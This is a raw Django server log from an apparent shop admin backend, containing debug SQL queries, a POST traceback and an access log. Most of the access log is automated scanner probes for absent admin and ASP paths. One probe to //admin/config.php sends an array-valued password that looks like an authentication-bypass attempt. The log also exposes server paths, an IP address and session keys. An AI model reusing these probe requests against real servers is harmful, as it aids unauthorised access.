DEBUG 2020-01-03 16:37:34,399 utils 27361 140408453592832 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2020-01-03 16:37:34,402 utils 27361 140408453592832 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2020-01-03 16:37:34,405 utils 27361 140408453592832 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2020-01-03 16:37:34,408 utils 27361 140408453592832 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2020-01-03 16:37:34,410 utils 27361 140408453592832 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2020-01-03 16:37:34,413 utils 27361 140408453592832 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2020-01-03 16:37:34,419 utils 27361 140408453592832 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2020-01-03 16:37:34,423 utils 27361 140408453592832 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2020-01-03 16:37:34,427 utils 27361 140408453592832 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2020-01-03 16:37:34,430 utils 27361 140408453592832 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2020-01-03 16:37:34,434 utils 27361 140408453592832 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2020-01-03 16:37:34,440 utils 27361 140408453592832 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2020-01-03 16:37:34,444 utils 27361 140408453592832 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2020-01-03 16:37:34,448 utils 27361 140408453592832 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2020-01-03 16:37:34,452 utils 27361 140408453592832 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2020-01-03 16:37:34,456 utils 27361 140408453592832 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2020-01-03 16:37:34,460 utils 27361 140408453592832 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2020-01-03 16:37:34,465 utils 27361 140408453592832 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2020-01-03 16:37:34,469 utils 27361 140408453592832 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2020-01-03 16:37:34,473 utils 27361 140408453592832 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2020-01-03 16:37:34,478 utils 27361 140408453592832 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2020-01-03 16:37:34,482 utils 27361 140408453592832 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [03/Jan/2020 16:37:34] "GET /api/v1/categories/ HTTP/1.0" 200 15396 [03/Jan/2020 16:44:41] "GET / HTTP/1.0" 302 0 [03/Jan/2020 16:49:44] "GET / HTTP/1.0" 302 0 [03/Jan/2020 16:54:46] "GET / HTTP/1.0" 302 0 [03/Jan/2020 16:59:49] "GET / HTTP/1.0" 302 0 [03/Jan/2020 17:05:01] "GET /whm-server-status HTTP/1.0" 301 0 [03/Jan/2020 17:05:03] "GET / HTTP/1.0" 302 0 Not Found: /robots.txt [03/Jan/2020 17:08:09] "GET /robots.txt HTTP/1.0" 404 6341 [03/Jan/2020 17:11:25] "GET / HTTP/1.0" 302 0 [03/Jan/2020 17:12:15] "GET / HTTP/1.0" 302 0 Not Found: /index.asp [03/Jan/2020 17:14:29] "GET /index.asp HTTP/1.0" 404 6338 [03/Jan/2020 17:16:27] "GET / HTTP/1.0" 302 0 Not Found: /newslist.asp [03/Jan/2020 17:21:06] "GET /newslist.asp?type=4&id=1732 HTTP/1.0" 404 6366 [03/Jan/2020 17:21:30] "GET / HTTP/1.0" 302 0 [03/Jan/2020 17:22:55] "GET / HTTP/1.0" 302 0 [03/Jan/2020 17:26:51] "GET / HTTP/1.0" 302 0 Not Found: /manager/html [03/Jan/2020 17:28:03] "GET /manager/html HTTP/1.0" 404 6346 [03/Jan/2020 17:31:54] "GET / HTTP/1.0" 302 0 [03/Jan/2020 17:40:01] "GET /whm-server-status HTTP/1.0" 301 0 [03/Jan/2020 17:41:52] "GET / HTTP/1.0" 302 0 [03/Jan/2020 17:47:22] "GET / HTTP/1.0" 302 0 [03/Jan/2020 17:52:25] "GET / HTTP/1.0" 302 0 [03/Jan/2020 17:57:27] "GET / HTTP/1.0" 302 0 [03/Jan/2020 18:05:03] "GET / HTTP/1.0" 302 0 [03/Jan/2020 18:10:05] "GET / HTTP/1.0" 302 0 [03/Jan/2020 18:11:24] "GET / HTTP/1.0" 302 0 Not Found: /robots.txt [03/Jan/2020 18:12:36] "GET /robots.txt HTTP/1.0" 404 6341 Not Found: /dyzl/Print.asp [03/Jan/2020 18:12:38] "GET /dyzl/Print.asp?ArticleID=283 HTTP/1.0" 404 6367 Not Found: /xyzx/SendMail.asp [03/Jan/2020 18:12:40] "GET /xyzx/SendMail.asp?ArticleID=408 HTTP/1.0" 404 6376 [03/Jan/2020 18:15:08] "GET / HTTP/1.0" 302 0 Not Found: /mailto:admin@admin.com [03/Jan/2020 18:19:13] "GET /mailto:admin@admin.com HTTP/1.0" 404 6377 Not Found: /dtgh/SendMail.asp [03/Jan/2020 18:19:21] "GET /dtgh/SendMail.asp?ArticleID=504 HTTP/1.0" 404 6376 Not Found: /xsyd/SendMail.asp [03/Jan/2020 18:19:23] "GET /xsyd/SendMail.asp?ArticleID=391 HTTP/1.0" 404 6376 Not Found: /User/User_Favorite.asp [03/Jan/2020 18:19:30] "GET /User/User_Favorite.asp?Action=Add&ChannelID=1002&InfoID=326 HTTP/1.0" 404 6422 Not Found: /newslist.asp [03/Jan/2020 18:19:44] "GET /newslist.asp?type=1&id=30100 HTTP/1.0" 404 6367 Not Found: /newslist.asp [03/Jan/2020 18:19:46] "GET /newslist.asp?type=1&id=80100 HTTP/1.0" 404 6367 [03/Jan/2020 18:20:11] "GET / HTTP/1.0" 302 0 Not Found: /aqgl/ShowArticle.asp [03/Jan/2020 18:22:19] "GET /aqgl/ShowArticle.asp?ArticleID=133 HTTP/1.0" 404 6385 Not Found: /dtgh/ShowArticle.asp [03/Jan/2020 18:22:23] "GET /dtgh/ShowArticle.asp?ArticleID=108 HTTP/1.0" 404 6385 [03/Jan/2020 18:25:13] "GET / HTTP/1.0" 302 0 Not Found: /xyzx/ShowArticle.asp [03/Jan/2020 18:28:19] "GET /xyzx/ShowArticle.asp?ArticleID=491 HTTP/1.0" 404 6385 Not Found: /bmxx/ShowArticle.asp [03/Jan/2020 18:29:00] "GET /bmxx/ShowArticle.asp?ArticleID=367 HTTP/1.0" 404 6385 [03/Jan/2020 18:30:16] "GET / HTTP/1.0" 302 0 [03/Jan/2020 18:35:19] "GET / HTTP/1.0" 302 0 [03/Jan/2020 18:40:21] "GET / HTTP/1.0" 302 0 [03/Jan/2020 18:45:24] "GET / HTTP/1.0" 302 0 [03/Jan/2020 18:51:27] "GET / HTTP/1.0" 302 0 [03/Jan/2020 18:56:30] "GET / HTTP/1.0" 302 0 [03/Jan/2020 19:05:01] "GET /whm-server-status HTTP/1.0" 301 0 [03/Jan/2020 19:05:02] "GET / HTTP/1.0" 302 0 [03/Jan/2020 19:10:05] "GET / HTTP/1.0" 302 0 Not Found: /newslist.asp [03/Jan/2020 19:13:20] "GET /newslist.asp?type=4&id=1708 HTTP/1.0" 404 6366 [03/Jan/2020 19:15:07] "GET / HTTP/1.0" 302 0 [03/Jan/2020 19:20:10] "GET / HTTP/1.0" 302 0 [03/Jan/2020 19:25:13] "GET / HTTP/1.0" 302 0 Not Found: /ShowAuthor.asp [03/Jan/2020 19:25:26] "GET /ShowAuthor.asp?ChannelID=1002&AuthorName=%EF%BF%BD%D3%B8%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%CF%B8%EF%BF%BD%EF%BF%BD%EF%BF%BD%C6%B6%EF%BF%BD%EF%BF%BD%EF%BF%BD%C4%B4%EF%BF%BD%EF%BF%BD%CA%B4%EF%BF%BD%EF%BF%BD%EF%BF%BD HTTP/1.0" 404 6558 [03/Jan/2020 19:30:01] "GET /whm-server-status HTTP/1.0" 301 0 [03/Jan/2020 19:30:16] "GET / HTTP/1.0" 302 0 [03/Jan/2020 19:35:01] "GET /whm-server-status HTTP/1.0" 301 0 [03/Jan/2020 19:35:19] "GET / HTTP/1.0" 302 0 Not Found: /TP/public/index.php [03/Jan/2020 19:41:16] "GET /TP/public/index.php HTTP/1.0" 404 6367 [03/Jan/2020 19:42:37] "GET / HTTP/1.0" 302 0 Not Found: /jspd/ShowArticle.asp [03/Jan/2020 19:45:58] "GET /jspd/ShowArticle.asp?ArticleID=173 HTTP/1.0" 404 6385 Not Found: /xyzx/UploadFiles_7376/201610/2016101711311503.zip [03/Jan/2020 19:46:26] "GET /xyzx/UploadFiles_7376/201610/2016101711311503.zip HTTP/1.0" 404 6458 Not Found: /newslist.asp [03/Jan/2020 19:46:32] "GET /newslist.asp?type=4&id=1194 HTTP/1.0" 404 6366 Not Found: /newslist.asp [03/Jan/2020 19:46:34] "GET /newslist.asp?type=4&id=1306 HTTP/1.0" 404 6366 Not Found: /newslist.asp [03/Jan/2020 19:46:36] "GET /newslist.asp?type=4&id=1316 HTTP/1.0" 404 6366 [03/Jan/2020 19:47:39] "GET / HTTP/1.0" 302 0 Not Found: /xyzx/Print.asp [03/Jan/2020 19:49:08] "GET /xyzx/Print.asp?ArticleID=505 HTTP/1.0" 404 6367 [03/Jan/2020 19:49:29] "GET / HTTP/1.0" 302 0 DEBUG 2020-01-03 19:49:30,015 utils 27361 140408453592832 (0.004) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'uhm3i2j6s08xoxivyzkrb3tfq0l2b9vj' LIMIT 1; args=('uhm3i2j6s08xoxivyzkrb3tfq0l2b9vj',) DEBUG 2020-01-03 19:49:30,018 utils 27361 140408453592832 (0.002) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('uhm3i2j6s08xoxivyzkrb3tfq0l2b9vj', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-17T19:49:30.016046+00:00'::timestamptz); args=('uhm3i2j6s08xoxivyzkrb3tfq0l2b9vj', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 17, 19, 49, 30, 16046, tzinfo=)) [03/Jan/2020 19:49:30] "GET /login/?next=/ HTTP/1.0" 200 1786 [03/Jan/2020 19:52:42] "GET / HTTP/1.0" 302 0 [03/Jan/2020 19:57:45] "GET / HTTP/1.0" 302 0 [03/Jan/2020 20:05:03] "GET / HTTP/1.0" 302 0 [03/Jan/2020 20:10:06] "GET / HTTP/1.0" 302 0 [03/Jan/2020 20:15:08] "GET / HTTP/1.0" 302 0 [03/Jan/2020 20:20:11] "GET / HTTP/1.0" 302 0 [03/Jan/2020 20:28:28] "GET / HTTP/1.0" 302 0 [03/Jan/2020 20:33:31] "GET / HTTP/1.0" 302 0 [03/Jan/2020 20:35:22] "GET / HTTP/1.0" 302 0 Not Found: /newslist.asp [03/Jan/2020 20:39:44] "GET /newslist.asp?type=2&id=20300 HTTP/1.0" 404 6367 Not Found: /xyzx/ShowArticle.asp [03/Jan/2020 20:39:47] "GET /xyzx/ShowArticle.asp?ArticleID=427 HTTP/1.0" 404 6385 Not Found: /jspd/ShowArticle.asp [03/Jan/2020 20:40:59] "GET /jspd/ShowArticle.asp?ArticleID=335 HTTP/1.0" 404 6385 [03/Jan/2020 20:43:09] "GET / HTTP/1.0" 302 0 [03/Jan/2020 20:45:01] "GET /whm-server-status HTTP/1.0" 301 0 Not Found: /000000000000.cfg [03/Jan/2020 20:47:37] "GET /000000000000.cfg HTTP/1.0" 404 6358 [03/Jan/2020 20:48:11] "GET / HTTP/1.0" 302 0 [03/Jan/2020 20:50:01] "GET /whm-server-status HTTP/1.0" 301 0 [03/Jan/2020 20:53:15] "GET / HTTP/1.0" 302 0 [03/Jan/2020 20:58:17] "GET / HTTP/1.0" 302 0 [03/Jan/2020 21:05:02] "GET / HTTP/1.0" 302 0 [03/Jan/2020 21:10:05] "GET / HTTP/1.0" 302 0 [03/Jan/2020 21:15:08] "GET / HTTP/1.0" 302 0 [03/Jan/2020 21:20:10] "GET / HTTP/1.0" 302 0 [03/Jan/2020 21:25:13] "GET / HTTP/1.0" 302 0 [03/Jan/2020 21:31:57] "GET / HTTP/1.0" 302 0 [03/Jan/2020 21:33:20] "GET / HTTP/1.0" 302 0 [03/Jan/2020 21:37:24] "GET / HTTP/1.0" 302 0 Not Found: /xsyd/Print.asp [03/Jan/2020 21:37:25] "GET /xsyd/Print.asp?ArticleID=464 HTTP/1.0" 404 6367 Not Found: /Admin/admin_login.asp [03/Jan/2020 21:38:39] "GET /Admin/admin_login.asp HTTP/1.0" 404 6374 Not Found: /aqgl/ShowArticle.asp [03/Jan/2020 21:40:00] "GET /aqgl/ShowArticle.asp?ArticleID=34 HTTP/1.0" 404 6384 [03/Jan/2020 21:42:27] "GET / HTTP/1.0" 302 0 Not Found: /newslist.asp [03/Jan/2020 21:44:48] "GET /newslist.asp?type=4&id=1281 HTTP/1.0" 404 6366 Not Found: /newslist.asp [03/Jan/2020 21:44:52] "GET /newslist.asp?type=4&id=1396 HTTP/1.0" 404 6366 Not Found: /newslist.asp [03/Jan/2020 21:45:10] "GET /newslist.asp?type=1&id=98900 HTTP/1.0" 404 6367 Not Found: /bmxx/ShowArticle.asp [03/Jan/2020 21:46:29] "GET /bmxx/ShowArticle.asp?ArticleID=354 HTTP/1.0" 404 6385 [03/Jan/2020 21:47:29] "GET / HTTP/1.0" 302 0 [03/Jan/2020 21:52:33] "GET / HTTP/1.0" 302 0 [03/Jan/2020 21:57:35] "GET / HTTP/1.0" 302 0 [03/Jan/2020 22:05:03] "GET / HTTP/1.0" 302 0 [03/Jan/2020 22:10:05] "GET / HTTP/1.0" 302 0 [03/Jan/2020 22:15:08] "GET / HTTP/1.0" 302 0 [03/Jan/2020 22:20:11] "GET / HTTP/1.0" 302 0 [03/Jan/2020 22:25:17] "GET / HTTP/1.0" 302 0 [03/Jan/2020 22:30:20] "GET / HTTP/1.0" 302 0 [03/Jan/2020 22:35:22] "GET / HTTP/1.0" 302 0 Not Found: /newslist.asp [03/Jan/2020 22:39:19] "GET /newslist.asp?type=4&id=1713 HTTP/1.0" 404 6366 [03/Jan/2020 22:40:25] "GET / HTTP/1.0" 302 0 Not Found: /bmxx/ShowArticle.asp [03/Jan/2020 22:42:07] "GET /bmxx/ShowArticle.asp?ArticleID=355 HTTP/1.0" 404 6385 [03/Jan/2020 22:45:27] "GET / HTTP/1.0" 302 0 [03/Jan/2020 22:50:31] "GET / HTTP/1.0" 302 0 [03/Jan/2020 22:55:33] "GET / HTTP/1.0" 302 0 [03/Jan/2020 22:56:19] "GET / HTTP/1.0" 302 0 Internal Server Error: /editBlackAndWhiteList Traceback (most recent call last): File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/core/handlers/exception.py", line 34, in inner response = get_response(request) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/utils/deprecation.py", line 93, in __call__ response = self.process_request(request) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/middleware/common.py", line 53, in process_request path = self.get_full_path_with_slash(request) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/middleware/common.py", line 93, in get_full_path_with_slash 'url': request.get_host() + new_path, RuntimeError: You called this URL via POST, but the URL doesn't end in a slash and you have APPEND_SLASH set. Django can't redirect to the slash URL while maintaining POST data. Change your form to point to 91.92.66.124/editBlackAndWhiteList/ (note the trailing slash), or set APPEND_SLASH=False in your Django settings. [03/Jan/2020 23:03:31] "POST /editBlackAndWhiteList HTTP/1.0" 500 66125 [03/Jan/2020 23:05:02] "GET / HTTP/1.0" 302 0 [03/Jan/2020 23:10:05] "GET / HTTP/1.0" 302 0 [03/Jan/2020 23:15:08] "GET / HTTP/1.0" 302 0 [03/Jan/2020 23:17:21] "GET /xsyd HTTP/1.0" 301 0 [03/Jan/2020 23:20:11] "GET / HTTP/1.0" 302 0 Not Found: /robots.txt [03/Jan/2020 23:23:43] "HEAD /robots.txt HTTP/1.0" 404 6344 [03/Jan/2020 23:25:13] "GET / HTTP/1.0" 302 0 Not Found: /User/User_Favorite.asp [03/Jan/2020 23:25:22] "GET /User/User_Favorite.asp?Action=Add&ChannelID=1008&InfoID=173 HTTP/1.0" 404 6422 [03/Jan/2020 23:30:16] "GET / HTTP/1.0" 302 0 [03/Jan/2020 23:35:19] "GET / HTTP/1.0" 302 0 Not Found: /robots.txt [03/Jan/2020 23:40:15] "GET /robots.txt HTTP/1.0" 404 6341 Not Found: /dyzl/Print.asp [03/Jan/2020 23:40:19] "GET /dyzl/Print.asp?ArticleID=282 HTTP/1.0" 404 6367 Not Found: /xyzx/SendMail.asp [03/Jan/2020 23:40:22] "GET /xyzx/SendMail.asp?ArticleID=415 HTTP/1.0" 404 6376 [03/Jan/2020 23:44:18] "GET / HTTP/1.0" 302 0 [03/Jan/2020 23:49:21] "GET / HTTP/1.0" 302 0 [03/Jan/2020 23:54:24] "GET / HTTP/1.0" 302 0 [03/Jan/2020 23:59:26] "GET / HTTP/1.0" 302 0 Not Found: /dyzl/UploadFiles_3009/201701/2017010615083517.jpg [03/Jan/2020 23:59:45] "GET /dyzl/UploadFiles_3009/201701/2017010615083517.jpg HTTP/1.0" 404 6458 Not Found: /User/User_Favorite.asp [04/Jan/2020 00:00:09] "GET /User/User_Favorite.asp?Action=Add&ChannelID=1007&InfoID=502 HTTP/1.0" 404 6422 Not Found: /User/User_Favorite.asp [04/Jan/2020 00:00:11] "GET /User/User_Favorite.asp?Action=Add&ChannelID=1009&InfoID=464 HTTP/1.0" 404 6422 Not Found: /dtgh/ShowArticle.asp [04/Jan/2020 00:03:24] "GET /dtgh/ShowArticle.asp?ArticleID=309 HTTP/1.0" 404 6385 Not Found: /xyzx/Comment.asp [04/Jan/2020 00:03:26] "GET /xyzx/Comment.asp?ArticleID=264 HTTP/1.0" 404 6373 Not Found: /xyzx/SendMail.asp [04/Jan/2020 00:03:28] "GET /xyzx/SendMail.asp?ArticleID=344 HTTP/1.0" 404 6376 [04/Jan/2020 00:05:02] "GET / HTTP/1.0" 302 0 Not Found: /newslist.asp [04/Jan/2020 00:08:54] "GET /newslist.asp?type=4&id=1392 HTTP/1.0" 404 6366 Not Found: /newslist.asp [04/Jan/2020 00:08:56] "GET /newslist.asp?type=4&id=1705 HTTP/1.0" 404 6366 Not Found: /newslist.asp [04/Jan/2020 00:08:59] "GET /newslist.asp?type=4&id=501 HTTP/1.0" 404 6365 [04/Jan/2020 00:10:05] "GET / HTTP/1.0" 302 0 [04/Jan/2020 00:11:20] "GET / HTTP/1.0" 302 0 [04/Jan/2020 00:15:08] "GET / HTTP/1.0" 302 0 [04/Jan/2020 00:20:11] "GET / HTTP/1.0" 302 0 [04/Jan/2020 00:25:14] "GET / HTTP/1.0" 302 0 [04/Jan/2020 00:30:16] "GET / HTTP/1.0" 302 0 [04/Jan/2020 00:35:19] "GET / HTTP/1.0" 302 0 [04/Jan/2020 00:40:22] "GET / HTTP/1.0" 302 0 Not Found: /ShowAuthor.asp [04/Jan/2020 00:44:35] "GET /ShowAuthor.asp?ChannelID=1005&AuthorName=%D0%A1%EF%BF%BD%EF%BF%BD%EF%BF%BD%D3%BF%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%DC%BF%EF%BF%BD HTTP/1.0" 404 6474 [04/Jan/2020 00:46:15] "GET / HTTP/1.0" 302 0 Not Found: /xsyd/ShowArticle.asp [04/Jan/2020 00:47:23] "GET /xsyd/ShowArticle.asp?ArticleID=406 HTTP/1.0" 404 6385 [04/Jan/2020 00:51:18] "GET / HTTP/1.0" 302 0 [04/Jan/2020 00:56:21] "GET / HTTP/1.0" 302 0 [04/Jan/2020 01:05:02] "GET /whm-server-status HTTP/1.0" 301 0 [04/Jan/2020 01:05:03] "GET / HTTP/1.0" 302 0 [04/Jan/2020 01:10:06] "GET / HTTP/1.0" 302 0 [04/Jan/2020 01:15:08] "GET / HTTP/1.0" 302 0 [04/Jan/2020 01:20:05] "GET / HTTP/1.0" 302 0 [04/Jan/2020 01:20:57] "GET / HTTP/1.0" 302 0 [04/Jan/2020 01:21:17] "GET / HTTP/1.0" 302 0 [04/Jan/2020 01:27:58] "GET / HTTP/1.0" 302 0 Not Found: //admin/config.php [04/Jan/2020 01:31:51] "GET //admin/config.php?password%5B0%5D=ZIZO&username=admin HTTP/1.0" 404 6401 [04/Jan/2020 01:33:01] "GET / HTTP/1.0" 302 0 [04/Jan/2020 01:38:04] "GET / HTTP/1.0" 302 0 [04/Jan/2020 01:43:07] "GET / HTTP/1.0" 302 0 Not Found: /robots.txt [04/Jan/2020 01:45:54] "GET /robots.txt HTTP/1.0" 404 6341 [04/Jan/2020 01:46:11] "GET / HTTP/1.0" 302 0 DEBUG 2020-01-04 01:46:11,897 utils 27361 140408453592832 (0.005) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'oq18cr6dgzooswp75q0jd7nmyljtycjo' LIMIT 1; args=('oq18cr6dgzooswp75q0jd7nmyljtycjo',) DEBUG 2020-01-04 01:46:11,900 utils 27361 140408453592832 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('oq18cr6dgzooswp75q0jd7nmyljtycjo', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-18T01:46:11.898237+00:00'::timestamptz); args=('oq18cr6dgzooswp75q0jd7nmyljtycjo', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 18, 1, 46, 11, 898237, tzinfo=)) [04/Jan/2020 01:46:11] "GET /login/?next=/ HTTP/1.0" 200 1786 [04/Jan/2020 01:48:10] "GET / HTTP/1.0" 302 0 Not Found: /aqgl/ShowArticle.asp [04/Jan/2020 01:51:28] "GET /aqgl/ShowArticle.asp?ArticleID=399 HTTP/1.0" 404 6385 Not Found: /xyzx/Comment.asp [04/Jan/2020 01:51:55] "GET /xyzx/Comment.asp?ArticleID=277 HTTP/1.0" 404 6373 [04/Jan/2020 01:53:13] "GET / 